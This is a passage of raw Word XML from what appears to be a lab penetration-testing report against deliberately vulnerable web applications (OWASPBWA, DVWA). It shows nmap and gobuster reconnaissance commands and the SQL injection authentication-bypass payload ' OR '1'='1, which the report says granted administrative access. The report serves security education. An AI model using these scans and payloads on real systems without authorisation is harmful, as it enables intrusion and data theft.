    <w:p w14:paraId="2CF668CF" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Services: FTP (21), SSH (22), Telnet (23), PostgreSQL (5432), VNC (5900)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F8A92" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerabilities: Unpatched services, default credentials, remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21666C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRDefault="007864B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913AD73" w14:textId="19438598" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5 Exploitation Campaign Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1E747" w14:textId="780D2E14" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.1 Exploit A: Web Application Compromise (OWASPBWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654241BE" w14:textId="1D5A79F6" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.1.1 Reconnaissance and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E103A5" w14:textId="0F5F89E1" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The first network reconnaissance was initiated with the use of Nmap to scan ports and list services in detail on the OWASPBWA target (192.168.227.128) [22].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855A0D2" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58073D87" w14:textId="40618E5D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --min-rate=1000 192.168.227.128 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C591B" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This destructive scan list uncovered various HTTP services running on the ports 80 and 443 and showed a variety of vulnerable web applications such as the Damn Vulnerable Web Application (DVWA) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0B041" w14:textId="613BF6EA" w:rsidR="00981222" w:rsidRDefault="00981222"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981222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D19157F" wp14:editId="46AE290F">
            <wp:extent cx="5943600" cy="3046095"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="284766683" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7208B504-2CD8-4BFB-88ED-D8A9D635CD7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766683" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3046095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B4FE6" w14:textId="736F3BE2" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to conduct directory enumeration to determine the web application endpoints and administrative interfaces that can be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4534C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRDefault="007864B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE52D9B" w14:textId="3CAC3D31" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13614F" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://192.168.227.128 -w /usr/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/common.txt -t 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2425C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRPr="00A000BA" w:rsidRDefault="007864B5" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065901B7" w14:textId="4EAE97C1" w:rsidR="00335216" w:rsidRDefault="00335216" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00335216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B00B1BD" wp14:editId="0676B1F1">
            <wp:extent cx="5943600" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="458905589" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA9DB5D-526A-4301-923F-46D299E1048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905589" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3125470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EF2FC" w14:textId="664B07F7" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.1.2 SQL Injection Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C8D4D" w14:textId="378B433E" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00F16CB9" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Technical analysis of the DVWA application indicated that the application is vulnerable to SQL injection attacks in authentication. SQL injection testing was performed manually and it was established that there were exploitable injection points that allowed bypassing authentication and enumerating the database [23].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095C86C" w14:textId="10E2DC59" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable parameter accepted user input without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parameterisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or input validation and the input was implicitly placed into SQL statements, allowing arbitrary execution of SQL commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D369E0B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploitation Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359D86D" w14:textId="655F2471" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C36C6" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Using this payload, the authentication logic was bypassed by modifying the SQL query to always check true which provided unauthorised administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D154C7C" w14:textId="3CFF9E64" w:rsidR="005D1B03" w:rsidRDefault="005D1B03"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5D1B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689344F0" wp14:editId="26C18B25">
            <wp:extent cx="5943600" cy="3131185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="413674289" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0906E3-9D44-46AE-A55F-63C7530EC9F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3674289" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3131185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B755C" w14:textId="6A03C123" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced enumeration utilised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
